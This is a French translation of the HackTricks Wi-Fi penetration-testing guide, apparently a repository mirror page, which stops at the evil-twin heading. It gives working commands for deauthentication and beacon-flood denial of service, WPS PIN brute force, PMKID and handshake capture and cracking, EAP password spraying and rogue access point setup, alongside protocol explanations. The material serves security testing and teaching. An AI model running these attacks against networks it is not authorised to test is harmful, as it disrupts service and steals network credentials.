Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-04 02:20:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/pentesting-wifi
History
Translator 66c5ce32f6 Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene
2023-12-30 22:30:15 +00:00
..
evil-twin-eap-tls.md Translated to French 2023-06-03 13:10:46 +00:00
README.md Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2023-12-30 22:30:15 +00:00

README.md

Test de pénétration Wifi

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes de bugs !

Aperçus du piratage
Engagez-vous avec du contenu qui plonge dans le frisson et les défis du piratage

Nouvelles du piratage en temps réel
Restez à jour avec le monde du piratage rapide grâce à des nouvelles et des aperçus en temps réel

Dernières annonces
Restez informé avec les lancements de nouvelles primes de bugs et les mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

Commandes de base Wifi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis

Outils

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Exécutez airgeddon avec docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

wifiphisher

Il peut réaliser des attaques Evil Twin, KARMA et Known Beacons, puis utiliser un modèle de phishing pour parvenir à obtenir le véritable mot de passe du réseau ou capturer des identifiants de réseaux sociaux.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Cet outil automatise les attaques WPS/WEP/WPA-PSK. Il va automatiquement :

  • Mettre l'interface en mode moniteur
  • Scanner les réseaux possibles - Et vous laisse choisir la ou les victimes
  • Si WEP - Lancer des attaques WEP
  • Si WPA-PSK
  • Si WPS : Attaque Pixie dust et l'attaque par force brute (attention, l'attaque par force brute peut prendre beaucoup de temps). Notez qu'il n'essaie pas de PIN nul ou de PINs générés par base de données.
  • Essayer de capturer le PMKID du point d'accès pour le craquer
  • Essayer de déauthentifier les clients du point d'accès pour capturer une poignée de main
  • Si PMKID ou poignée de main, essayer de forcer le bruteforce en utilisant les 5000 meilleurs mots de passe.

Résumé des attaques

  • DoS
  • Déauthentification/dissociation -- Déconnecter tout le monde (ou un ESSID/Client spécifique)
  • Points d'accès factices aléatoires -- Cacher les réseaux, peut-être faire planter les scanners
  • Surcharge du point d'accès -- Essayer de tuer le point d'accès (généralement pas très utile)
  • WIDS -- Jouer avec le système de détection d'intrusion
  • TKIP, EAPOL -- Quelques attaques spécifiques pour faire un DoS sur certains points d'accès
  • Cracking
  • Craquer WEP (plusieurs outils et méthodes)
  • WPA-PSK
  • WPS pin "Force brute"
  • WPA PMKID force brute
  • [DoS +] Capture de poignée de main WPA + Cracking
  • WPA-MGT
  • Capture de nom d'utilisateur
  • Force brute des identifiants
  • Evil Twin (avec ou sans DoS)
  • Open Evil Twin [+ DoS] -- Utile pour capturer les identifiants de portail captif et/ou réaliser des attaques LAN
  • WPA-PSK Evil Twin -- Utile pour les attaques réseau si vous connaissez le mot de passe
  • WPA-MGT -- Utile pour capturer les identifiants d'entreprise
  • KARMA, MANA, Loud MANA, Known beacon
  • + Open -- Utile pour capturer les identifiants de portail captif et/ou réaliser des attaques LAN
  • + WPA -- Utile pour capturer les poignées de main WPA

DOS

Paquets de déauthentification

La manière la plus courante de réaliser ce type d'attaque se fait avec des paquets de déauthentification. Ce sont un type de trame de "gestion" responsable de la déconnexion d'un appareil d'un point d'accès. Forger ces paquets est la clé pour pirater de nombreux réseaux Wi-Fi, car vous pouvez déconnecter de force n'importe quel client du réseau à tout moment. La facilité avec laquelle cela peut être fait est quelque peu effrayante et est souvent réalisée dans le cadre de la collecte d'une poignée de main WPA pour le cracking.

Outre l'utilisation momentanée de cette déconnexion pour récolter une poignée de main à craquer, vous pouvez également laisser ces déauthentifications continuer, ce qui a pour effet de bombarder le client avec des paquets de déauthentification apparemment provenant du réseau auquel ils sont connectés. Comme ces trames ne sont pas chiffrées, de nombreux programmes tirent parti des trames de gestion en les forgeant et en les envoyant à un ou à tous les appareils d'un réseau.
Description de ici.

Déauthentification en utilisant Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 signifie déauthentification
  • 1 est le nombre de déauthentifications à envoyer (vous pouvez en envoyer plusieurs si vous le souhaitez) ; 0 signifie les envoyer en continu
  • -a 00:14:6C:7E:40:80 est l'adresse MAC du point d'accès
  • -c 00:0F:B5:34:30:30 est l'adresse MAC du client à déauthentifier ; si ceci est omis, alors une déauthentification broadcast est envoyée (ne fonctionne pas toujours)
  • ath0 est le nom de l'interface

Paquets de Dissociation

Les paquets de dissociation sont un autre type de trame de gestion utilisée pour déconnecter un nœud (signifiant tout appareil comme un ordinateur portable ou un téléphone portable) d'un point d'accès à proximité. La différence entre les trames de déauthentification et de dissociation réside principalement dans la manière dont elles sont utilisées.

Un PA cherchant à déconnecter un appareil non autorisé enverra un paquet de déauthentification pour informer l'appareil qu'il a été déconnecté du réseau, tandis qu'un paquet de dissociation est utilisé pour déconnecter tous les nœuds lorsque le PA s'éteint, redémarre ou quitte la zone.

Description tirée de ici.

Cette attaque peut être réalisée par mdk4(mode "d") :

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Plus d'attaques DOS par mdk4

Depuis ici.

MODE D'ATTAQUE b : Inondation de balises (Beacon Flooding)

Envoie des trames de balise pour afficher de faux points d'accès (APs) chez les clients. Cela peut parfois faire planter les scanners de réseau et même les pilotes !

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

MODE D'ATTAQUE a : Déni de Service d'Authentification

Envoie des trames d'authentification à tous les points d'accès trouvés à portée. Trop de clients peuvent geler ou réinitialiser plusieurs points d'accès.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

MODE D'ATTAQUE p : Exploration et Bruteforce de SSID

Explore les points d'accès et vérifie les réponses, utile pour vérifier si le SSID a été correctement dévoilé et si le point d'accès est à portée d'envoi. Le bruteforce de SSIDs cachés avec ou sans liste de mots est également disponible.

MODE D'ATTAQUE m : Exploitation des Contre-mesures Michael

Envoie des paquets aléatoires ou réinjecte des doublons sur une autre file d'attente QoS pour provoquer les Contre-mesures Michael sur les points d'accès TKIP. Le point d'accès sera alors arrêté pendant une minute entière, ce qui en fait un DoS efficace.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

MODE D'ATTAQUE e : Injection de paquets EAPOL Start et Logoff

Inonde un point d'accès avec des trames EAPOL Start pour l'occuper avec des sessions factices et ainsi l'empêcher de gérer les clients légitimes. Ou déconnecte les clients en injectant de faux messages EAPOL Logoff.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

MODE D'ATTAQUE s : Attaques pour les réseaux maillés IEEE 802.11s

Diverses attaques sur la gestion des liens et le routage dans les réseaux maillés. Inondez les voisins et les routes, créez des trous noirs et détournez le trafic !

MODE D'ATTAQUE w : Confusion WIDS

Confondez/Abusez des systèmes de détection et de prévention des intrusions en connectant de manière croisée les clients à plusieurs nœuds WDS ou à de faux points d'accès voyous.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

MODE D'ATTAQUE f : Packet Fuzzer

Un fuzzer de paquets simple avec de multiples sources de paquets et un bel ensemble de modificateurs. Soyez prudent !

Airgeddon

Airgeddon offre la plupart des attaques proposées dans les commentaires précédents :

WPS

WPS signifie Wi-Fi Protected Setup. C'est une norme de sécurité de réseau sans fil qui essaie de rendre les connexions entre un routeur et des appareils sans fil plus rapides et plus faciles. Le WPS fonctionne uniquement pour les réseaux sans fil qui utilisent un mot de passe chiffré avec les protocoles de sécurité WPA Personnel ou WPA2 Personnel. Le WPS ne fonctionne pas sur les réseaux sans fil qui utilisent la sécurité WEP obsolète, qui peut être facilement craquée par n'importe quel hacker avec un ensemble d'outils et de compétences de base. (Depuis ici)

Le WPS utilise un PIN de 8 chiffres pour permettre à un utilisateur de se connecter au réseau, mais d'abord les 4 premiers chiffres sont vérifiés et, si corrects, alors les 4 derniers chiffres sont vérifiés. Il est donc possible de forcer brutalement la première moitié puis la seconde moitié (seulement 11000 possibilités).

Bruteforce WPS

Il existe 2 outils principaux pour effectuer cette action : Reaver et Bully.

  • Reaver a été conçu pour être une attaque robuste et pratique contre le WPS, et a été testé contre une grande variété de points d'accès et d'implémentations WPS.
  • Bully est une nouvelle implémentation de l'attaque par force brute WPS, écrite en C. Elle présente plusieurs avantages par rapport au code reaver original : moins de dépendances, amélioration de la performance mémoire et CPU, gestion correcte de l'endianness, et un ensemble d'options plus robuste.

Cette attaque tire parti d'une faiblesse dans le code PIN WPS de huit chiffres ; à cause de ce problème, le protocole divulgue des informations sur les quatre premiers chiffres du PIN, et le dernier chiffre fonctionne comme un checksum, ce qui facilite le bruteforce du PA WPS.
Notez que certains dispositifs incluent des protections contre la force brute, qui bloquent généralement les adresses MAC qui tentent de répéter l'attaque. Dans ce cas, la complexité de cette attaque augmente, car vous devriez changer d'adresse MAC tout en testant les PINs.

Si le code WPS valide est trouvé, Bully et Reaver l'utiliseront pour découvrir le PSK WPA/WPA2 utilisé pour protéger le réseau, vous pourrez donc vous connecter chaque fois que vous en aurez besoin.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Attaque par force brute intelligente

Au lieu de commencer à essayer chaque PIN possible, vous devriez vérifier s'il existe des PINs découverts pour le point d'accès que vous attaquez (en fonction du MAC du fabricant) et les PINs générés par le logiciel.

  • La base de données des PINs connus est faite pour les points d'accès de certains fabricants pour lesquels on sait qu'ils utilisent les mêmes PINs WPS. Cette base de données contient les trois premiers octets des adresses MAC et une liste de PINs correspondants qui sont très probables pour ce fabricant.
  • Il existe plusieurs algorithmes pour générer des PINs WPS. Par exemple, ComputePIN et EasyBox utilisent l'adresse MAC du point d'accès dans leurs calculs. Mais l'algorithme Arcadyan nécessite également un identifiant de dispositif.

Attaque WPS Pixie Dust

Dominique Bongard a découvert que certains points d'accès ont des méthodes faibles de génération de nonces (connus sous le nom de E-S1 et E-S2) qui sont censés être secrets. Si nous parvenons à déterminer quels sont ces nonces, nous pouvons facilement trouver le PIN WPS d'un point d'accès puisque le point d'accès doit nous le donner dans un hash pour prouver qu'il connaît également le PIN, et que le client ne se connecte pas à un point d'accès malveillant. Ces E-S1 et E-S2 sont essentiellement les "clés pour déverrouiller la boîte contenant le PIN WPS". Plus d'infos ici : https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

En gros, certaines implémentations ont échoué dans l'utilisation de clés aléatoires pour chiffrer les 2 parties du PIN (car il est décomposé en 2 parties pendant la communication d'authentification et envoyé au client), donc une attaque hors ligne pourrait être utilisée pour forcer le PIN valide.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Attaque par PIN nul

Certaines implémentations vraiment mauvaises permettaient la connexion avec un PIN nul (très étrange également). Reaver peut tester cela (Bully ne le peut pas).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Toutes les attaques WPS proposées peuvent être facilement réalisées en utilisant airgeddon.

  • 5 et 6 vous permettent d'essayer votre propre PIN (si vous en avez un)
  • 7 et 8 effectuent l'attaque Pixie Dust
  • 13 vous permet de tester le PIN NULL
  • 11 et 12 vont recueillir les PINs liés au point d'accès sélectionné à partir des bases de données disponibles et générer des PINs possibles en utilisant : ComputePIN, EasyBox et optionnellement Arcadyan (recommandé, pourquoi pas ?)
  • 9 et 10 testeront chaque PIN possible

WEP

Tellement cassé et disparu que je ne vais pas en parler. Sachez juste qu'airgeddon a une option WEP appelée "All-in-One" pour attaquer ce type de protection. Plus d'outils offrent des options similaires.

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes de bugs !

Aperçus du Hacking
Engagez-vous avec du contenu qui plonge dans l'excitation et les défis du hacking

Nouvelles du Hacking en Temps Réel
Restez à jour avec le monde du hacking rapide grâce à des nouvelles et des aperçus en temps réel

Dernières Annonces
Restez informé avec les dernières primes de bugs lancées et les mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

WPA/WPA2 PSK

PMKID

En 2018, les auteurs de hashcat ont révélé un nouveau type d'attaque qui ne repose pas seulement sur un seul paquet, mais qui ne nécessite pas non plus que des clients soient connectés à notre point d'accès cible, mais juste une communication entre l'attaquant et le point d'accès.

Il s'avère que beaucoup de routeurs modernes ajoutent un champ optionnel à la fin du premier cadre EAPOL envoyé par le point d'accès lui-même lorsqu'une personne s'associe, le soi-disant Robust Security Network, qui comprend quelque chose appelé PMKID

Comme expliqué dans le post original, le PMKID est dérivé en utilisant des données qui nous sont connues :

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Puisque la chaîne "PMK Name" est constante, nous connaissons à la fois le BSSID du point d'accès (AP) et de la station et le PMK est le même que celui obtenu à partir d'une authentification complète en 4 étapes, c'est tout ce dont hashcat a besoin pour craquer le PSK et récupérer la phrase secrète ! Description obtenue ici.

Pour collecter ces informations et forcer brutalement localement le mot de passe, vous pouvez faire :

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Les PMKIDs capturés seront affichés dans la console et également sauvegardés à l'intérieur de _/tmp/attack.pcap_ Maintenant, convertissez la capture au format hashcat/john et craquez-la :

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Veuillez noter que le format d'un hash correct contient 4 parties, comme : 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838
__Si le vôtre contient uniquement 3 parties, alors, il est invalide (la capture PMKID n'était pas valide).

Notez que hcxdumptool capture également les handshakes (quelque chose comme ceci apparaîtra : MP:M1M2 RC:63258 EAPOLTIME:17091). Vous pourriez transformer les handshakes en format hashcat/john en utilisant cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

J'ai remarqué que certains handshakes capturés avec cet outil ne pouvaient pas être crackés même en connaissant le mot de passe correct. Je recommanderais de capturer les handshakes également de manière traditionnelle si possible, ou de capturer plusieurs d'entre eux en utilisant cet outil.

Capture de Handshake

Une méthode pour attaquer les réseaux WPA/WPA2 consiste à capturer un handshake et essayer de cracker le mot de passe utilisé hors ligne. Pour cela, vous devez trouver le BSSID et le canal du réseau victime, ainsi qu'un client connecté au réseau.
Une fois que vous avez ces informations, vous devez commencer à écouter toute la communication de ce BSSID sur ce canal, car, espérons-le, le handshake sera envoyé là :

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

Maintenant, vous devez déconnecter le client pendant quelques secondes afin qu'il s'authentifie automatiquement à nouveau auprès du point d'accès (AP) (veuillez lire la partie sur le DoS pour trouver plusieurs méthodes de déconnexion d'un client) :

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work

Remarquez que lorsque le client est désauthentifié, il pourrait essayer de se connecter à un autre point d'accès (AP) ou, dans d'autres cas, à un réseau différent.

Une fois que des informations de handshake apparaissent dans airodump-ng, cela signifie que le handshake a été capturé et vous pouvez arrêter l'écoute :

Une fois le handshake capturé, vous pouvez le cracker avec aircrack-ng :

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Vérifier si la poignée de main est dans le fichier

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Si cet outil trouve une poignée de main incomplète d'un ESSID avant la complète, il ne détectera pas la valide.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Entreprise (MGT)

Il est important de parler des différentes méthodes d'authentification qui pourraient être utilisées par un Wifi d'entreprise. Pour ce type de Wifi, vous trouverez probablement dans airodump-ng quelque chose comme ceci :

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

EAP (Protocole d'Authentification Extensible) est le squelette de la communication d'authentification, sur cette base, un algorithme d'authentification est utilisé par le serveur pour authentifier le client (suppliant) et dans certains cas par le client pour authentifier le serveur. Principaux algorithmes d'authentification utilisés dans ce cas :

  • EAP-GTC : C'est une méthode EAP pour supporter l'utilisation de jetons matériels et de mots de passe à usage unique avec EAP-PEAP. Son implémentation est similaire à MSCHAPv2, mais n'utilise pas de défi par les pairs. Au lieu de cela, les mots de passe sont envoyés au point d'accès en texte clair (très intéressant pour les attaques par dégradation).
  • EAP-MD-5 (Message Digest) : Le client envoie le hachage MD5 du mot de passe. Non recommandé : Vulnérable aux attaques par dictionnaire, pas d'authentification du serveur et aucun moyen de générer des clés de confidentialité équivalentes au câblage (WEP) par session.
  • EAP-TLS (Transport Layer Security) : Il repose sur des certificats côté client et côté serveur pour effectuer l'authentification et peut être utilisé pour générer dynamiquement des clés WEP basées sur l'utilisateur et la session pour sécuriser les communications ultérieures.
  • EAP-TTLS (Tunneled Transport Layer Security) : Authentification mutuelle du client et du réseau via un canal chiffré (ou tunnel), ainsi qu'un moyen de dériver des clés WEP dynamiques, par utilisateur et par session. Contrairement à EAP-TLS, EAP-TTLS nécessite uniquement des certificats côté serveur (le client utilisera des identifiants).
  • PEAP (Protected Extensible Authentication Protocol) : PEAP est comme le protocole EAP mais crée un tunnel TLS pour protéger la communication. Ensuite, des protocoles d'authentification faibles peuvent être utilisés au-dessus de EAP car ils seront protégés par le tunnel.
  • PEAP-MSCHAPv2 : Cela est également connu sous le nom de PEAP car il est largement adopté. Il s'agit simplement du défi/réponse vulnérable appelé MSCHAPv2 au-dessus de PEAP (il est protégé par le tunnel TLS).
  • PEAP-EAP-TLS ou simplement PEAP-TLS : Est très similaire à EAP-TLS mais un tunnel TLS est créé avant que les certificats ne soient échangés.

Vous pouvez trouver plus d'informations sur ces méthodes d'authentification ici et ici.

Capture de nom d'utilisateur

En lisant https://tools.ietf.org/html/rfc3748#page-27, il semble que si vous utilisez EAP, les messages "Identity" doivent être pris en charge, et le nom d'utilisateur va être envoyé en clair dans les messages "Response Identity".

Même en utilisant l'une des méthodes d'authentification les plus sécurisées : PEAP-EAP-TLS, il est possible de capturer le nom d'utilisateur envoyé dans le protocole EAP. Pour ce faire, capturez une communication d'authentification (démarrez airodump-ng dans un canal et wireshark sur la même interface) et filtrez les paquets par eapol.
Dans le paquet "Response, Identity", le nom d'utilisateur du client apparaîtra.

Identités Anonymes

(Informations prises de https://www.interlinknetworks.com/app_notes/eap-peap.htm)

EAP-PEAP et EAP-TTLS prennent en charge la dissimulation d'identité. Dans un environnement WiFi, le point d'accès (AP) génère généralement une demande d'identité EAP dans le cadre du processus d'association. Pour préserver l'anonymat, le client EAP sur le système de l'utilisateur peut répondre avec seulement assez d'informations pour permettre au premier serveur RADIUS de traiter la demande, comme illustré dans les exemples suivants.

  • EAP-Identity = anonymous

Dans cet exemple, tous les utilisateurs partageront le pseudo-nom d'utilisateur “anonymous”. Le premier serveur RADIUS est un serveur EAP-PEAP ou EAP-TTLS qui gère l'extrémité serveur du protocole PEAP ou TTLS. Le type d'authentification interne (protégé) sera ensuite traité localement ou transmis à un serveur RADIUS distant (d'origine).

  • EAP-Identity = anonymous@realm_x

Dans cet exemple, les utilisateurs appartenant à différents domaines cachent leur propre identité mais indiquent à quel domaine ils appartiennent afin que le premier serveur RADIUS puisse transmettre les demandes EAP-PEAP ou EAP-TTLS aux serveurs RADIUS de leur domaine d'origine qui agiront comme le serveur PEAP ou TTLS. Le premier serveur agit purement comme un nœud de relais RADIUS.

Alternativement, le premier serveur peut agir comme le serveur EAP-PEAP ou EAP-TTLS et soit traiter la méthode d'authentification protégée ou la transmettre à un autre serveur. Cette option peut être utilisée pour configurer différentes politiques pour différents domaines.

Dans EAP-PEAP, une fois que le serveur PEAP et le client PEAP établissent le tunnel TLS, le serveur PEAP génère une demande d'identité EAP et la transmet dans le tunnel TLS. Le client répond à cette seconde demande d'identité EAP en envoyant une réponse d'identité EAP contenant la véritable identité de l'utilisateur dans le tunnel chiffré. Cela empêche quiconque d'écouter le trafic 802.11 de découvrir la véritable identité de l'utilisateur.

EAP-TTLS fonctionne légèrement différemment. Avec EAP-TTLS, le client s'authentifie généralement via PAP ou CHAP protégé par le tunnel TLS. Dans ce cas, le client inclura un attribut User-Name et soit un attribut Password soit CHAP-Password dans le premier message TLS envoyé après l'établissement du tunnel.

Avec l'un ou l'autre protocole, le serveur PEAP/TTLS apprend la véritable identité de l'utilisateur une fois le tunnel TLS établi. La véritable identité peut être soit sous la forme user@realm soit simplement user. Si le serveur PEAP/TTLS authentifie également l'utilisateur, il connaît maintenant l'identité de l'utilisateur et procède avec la méthode d'authentification protégée par le tunnel TLS. Alternativement, le serveur PEAP/TTLS peut transmettre une nouvelle demande RADIUS au serveur RADIUS d'origine de l'utilisateur. Cette nouvelle demande RADIUS a le protocole PEAP ou TTLS retiré. Si la méthode d'authentification protégée est EAP, les messages EAP internes sont transmis au serveur RADIUS d'origine sans l'enveloppe EAP-PEAP ou EAP-TTLS. L'attribut User-Name du message RADIUS sortant contient la véritable identité de l'utilisateur et non l'identité anonyme de l'attribut User-Name de la demande RADIUS entrante. Si la méthode d'authentification protégée est PAP ou CHAP (uniquement pris en charge par TTLS), l'User-Name et les autres attributs d'authentification récupérés du contenu TLS sont placés dans le message RADIUS sortant à la place de l'User-Name anonyme et des attributs EAP-Message TTLS inclus dans la demande RADIUS entrante.

EAP-Bruteforce (pulvérisation de mot de passe)

Si le client doit utiliser un nom d'utilisateur et un mot de passe (notez que EAP-TLS ne sera pas valide dans ce cas), alors vous pourriez essayer d'obtenir une liste de noms d'utilisateur (voir la partie suivante) et mots de passe et tenter de forcer brutalement l'accès en utilisant air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Vous pourriez également réaliser cette attaque en utilisant eaphammer :

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Attaques sur les clients - Théorie

Sélection de réseau et itinérance

Bien que le protocole 802.11 ait des règles très spécifiques qui dictent comment une station peut rejoindre un ESS, il ne spécifie pas comment la station doit sélectionner un ESS pour se connecter. De plus, le protocole permet aux stations de se déplacer librement entre les points d'accès qui partagent le même ESSID (car vous ne voudriez pas perdre la connectivité WiFi en marchant d'un bout à l'autre d'un bâtiment, etc). Cependant, le protocole 802.11 ne spécifie pas comment ces points d'accès doivent être sélectionnés. En outre, même si les stations doivent être authentifiées à l'ESS pour s'associer à un point d'accès, le protocole 802.11 n'exige pas que le point d'accès soit authentifié à la station.

Listes de réseaux préférés (PNLs)

Chaque fois qu'une station se connecte à un réseau sans fil, l'ESSID du réseau est stocké dans la Liste de Réseaux Préférés (PNL) de la station. La PNL est une liste ordonnée de tous les réseaux auxquels la station s'est connectée dans le passé, et chaque entrée dans la PNL contient l'ESSID du réseau et toutes les informations de configuration spécifiques au réseau nécessaires pour établir une connexion.

Balayage passif

Dans les réseaux d'infrastructure, les points d'accès transmettent périodiquement des trames de balise pour annoncer leur présence et leurs capacités aux stations à proximité. Les balises sont des trames de diffusion, ce qui signifie qu'elles sont destinées à être reçues par toutes les stations à proximité dans la portée. Les balises incluent des informations sur les taux pris en charge par le PA, les capacités de chiffrement, des informations supplémentaires, et surtout, les trames de balise contiennent l'ESSID du PA (tant que la diffusion de l'ESSID n'est pas désactivée).

Lors du balayage passif, le dispositif client écoute les trames de balise des points d'accès à proximité. Si le dispositif client reçoit une trame de balise dont le champ ESSID correspond à un ESSID de la PNL du client, le client se connectera automatiquement au point d'accès qui a envoyé la trame de balise. Ensuite, supposons que nous voulons cibler un dispositif sans fil qui n'est actuellement connecté à aucun réseau sans fil. Si nous connaissons au moins une entrée dans la PNL de ce client, nous pouvons forcer le client à se connecter à nous simplement en créant notre propre point d'accès avec l'ESSID de cette entrée.

Sondage actif

Le deuxième algorithme de sélection de réseau utilisé dans le 802.11 est connu sous le nom de Sondage Actif. Les dispositifs clients qui utilisent le sondage actif transmettent continuellement des trames de requête de sondage pour déterminer quels PA sont à portée, ainsi que leurs capacités. Les requêtes de sondage se présentent sous deux formes : dirigées et de diffusion. Les requêtes de sondage dirigées sont adressées à un ESSID spécifique, et sont le moyen pour le client de vérifier si un réseau spécifique est à proximité.

Les clients qui utilisent le sondage dirigé enverront des requêtes de sondage pour chaque réseau dans sa PNL. Il convient de noter que le sondage dirigé est le seul moyen d'identifier la présence de réseaux cachés à proximité. Les requêtes de sondage de diffusion fonctionnent presque exactement de la même manière, mais sont envoyées avec le champ SSID défini sur NULL. Cela adresse la requête de sondage de diffusion à tous les points d'accès à proximité, permettant à la station de vérifier si l'un de ses réseaux préférés est à proximité sans révéler le contenu de sa PNL

AP simple avec redirection vers Internet

Avant d'expliquer comment réaliser des attaques plus complexes, il va être expliqué comment simplement créer un AP et rediriger son trafic vers une interface connectée à l'Internet.

En utilisant ifconfig -a, vérifiez que l'interface wlan pour créer l'AP et l'interface connectée à Internet sont présentes.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

créez un fichier de configuration /etc/dnsmasq.conf comme suit :

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Ensuite, configurez les IP et les routes :

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Et ensuite démarrez dnsmasq :

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Créez un fichier de configuration hostapd.conf :

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Arrêtez les processus ennuyeux, activez le mode moniteur, et démarrez hostapd :

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Transfert et Redirection

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Jumeau Maléfique

